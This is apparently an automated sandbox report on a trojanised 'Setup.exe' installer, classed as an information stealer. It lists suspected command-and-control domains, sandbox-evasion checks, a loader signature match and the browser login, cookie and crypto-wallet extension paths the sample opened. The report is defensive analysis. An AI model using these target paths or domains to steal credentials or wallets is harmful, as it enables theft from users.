              Source: Setup.exe, 00000000.00000003.1878218138.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855536746.00000000035C2000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1877972918.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855671839.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1877742491.00000000035BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Setup.exe, 00000000.00000003.1855671839.0000000003596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: Setup.exe, 00000000.00000003.1925122513.0000000003568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: Setup.exe, 00000000.00000003.1831888176.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1831909637.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1853982813.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1832008489.0000000000B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
              Source: Setup.exe, 00000000.00000003.1831888176.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1831909637.0000000000B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
              Source: Setup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855160719.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Setup.exe, 00000000.00000003.1902259119.000000000356F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: Setup.exe, 00000000.00000003.1855051726.00000000035AD000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1854951005.00000000035AF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1855160719.00000000035AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Setup.exeString found in binary or memory: https://www.innosetup.com/
              Source: Setup.exe, 00000000.00000003.1901821768.000000000368C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Setup.exe, 00000000.00000003.1901821768.000000000368C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Setup.exe, 00000000.00000003.1901821768.000000000368C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Setup.exe, 00000000.00000003.1901821768.000000000368C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Setup.exe, 00000000.00000003.1901821768.000000000368C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: Setup.exeString found in binary or memory: https://www.remobjects.com/ps
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.177.88:443 -> 192.168.2.4:49744 version: TLS 1.2

              System Summary

              barindex
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B5E0980_3_00B5E098
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B678C10_3_00B678C1
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B5E2270_3_00B5E227
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B5CE210_3_00B5CE21
              Source: Setup.exeStatic PE information: invalid certificate
              Source: Setup.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: Setup.exe, 00000000.00000003.1810884308.0000000002B3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Setup.exe
              Source: Setup.exe, 00000000.00000000.1680534287.00000000006E0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Setup.exe
              Source: Setup.exeBinary or memory string: OriginalFileName vs Setup.exe
              Source: Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Setup.exe, 00000000.00000003.1855844919.0000000003565000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Setup.exeVirustotal: Detection: 34%
              Source: Setup.exeReversingLabs: Detection: 36%
              Source: Setup.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
              Source: Setup.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
              Source: Setup.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
              Source: Setup.exeString found in binary or memory: /LoadInf=
              Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: Setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: Setup.exeStatic file information: File size 3467041 > 1048576
              Source: Setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2c2200
              Source: Setup.exeStatic PE information: real checksum: 0x9ef7f6 should be: 0x35e084
              Source: Setup.exeStatic PE information: section name: .didata
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B75BA4 push esi; retf 0_3_00B75BA7
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B75BA4 push esi; retf 0_3_00B75BA7
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B88BA8 push esi; retf 0069h0_3_00B88BA9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B88BA8 push esi; retf 0069h0_3_00B88BA9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B88BA8 push esi; retf 0069h0_3_00B88BA9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B88BA8 push esi; retf 0069h0_3_00B88BA9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B89158 push esi; retf 0069h0_3_00B89159
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B89158 push esi; retf 0069h0_3_00B89159
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B89158 push esi; retf 0069h0_3_00B89159
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B89158 push esi; retf 0069h0_3_00B89159
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B34EA7 push esp; iretd 0_3_00B34EB2
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B34EF5 push esp; ret 0_3_00B34F12
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B34EC7 push esp; retf 0_3_00B34ED2
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B5E623 push 00000078h; retf 0_3_00B5E625
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B5CD17 push cs; iretd 0_3_00B5CD18
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B5C81F push ds; retf 0_3_00B5C820
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B75BA4 push esi; retf 0_3_00B75BA7
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B75BA4 push esi; retf 0_3_00B75BA7
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B88BA8 push esi; retf 0069h0_3_00B88BA9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B88BA8 push esi; retf 0069h0_3_00B88BA9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B88BA8 push esi; retf 0069h0_3_00B88BA9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B88BA8 push esi; retf 0069h0_3_00B88BA9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B89158 push esi; retf 0069h0_3_00B89159
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B89158 push esi; retf 0069h0_3_00B89159
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B89158 push esi; retf 0069h0_3_00B89159
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B89158 push esi; retf 0069h0_3_00B89159
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B6C1A5 push esp; ret 0_3_00B6C1A7
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B6C1A5 push esp; ret 0_3_00B6C1A7
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B6C1A5 push esp; ret 0_3_00B6C1A7
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B75BA4 push esi; retf 0_3_00B75BA7
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_3_00B75BA4 push esi; retf 0_3_00B75BA7
              Source: C:\Users\user\Desktop\Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup.exe TID: 1364Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Setup.exe TID: 3120Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Setup.exe, 00000000.00000002.2013850963.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1948547034.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1831909637.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1993073518.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1967648591.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1853982813.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1927185974.0000000000B44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWS
              Source: Setup.exe, Setup.exe, 00000000.00000003.1831909637.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2013850963.0000000000B01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\Setup.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Setup.exe, 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
              Source: Setup.exe, 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
              Source: Setup.exe, 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
              Source: Setup.exe, 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
              Source: Setup.exe, 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
              Source: Setup.exe, 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
              Source: Setup.exe, 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
              Source: Setup.exe, 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
              Source: Setup.exe, 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: cheapptaxysu.click
              Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Setup.exe, 00000000.00000003.1948547034.0000000000B5B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1992831324.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1948547034.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1948547034.0000000000B86000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1967648591.0000000000BAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000000.00000003.1948547034.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 5064, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Setup.exeString found in binary or memory: Wallets/Electrum-LTC
              Source: Setup.exeString found in binary or memory: Wallets/ElectronCash
              Source: Setup.exeString found in binary or memory: Jaxx Liberty
              Source: Setup.exeString found in binary or memory: window-state.json
              Source: Setup.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Setup.exeString found in binary or memory: ExodusWeb3
              Source: Setup.exeString found in binary or memory: Wallets/Ethereum
              Source: Setup.exe, 00000000.00000003.1924884334.0000000000B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Setup.exe, 00000000.00000003.1924884334.0000000000B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
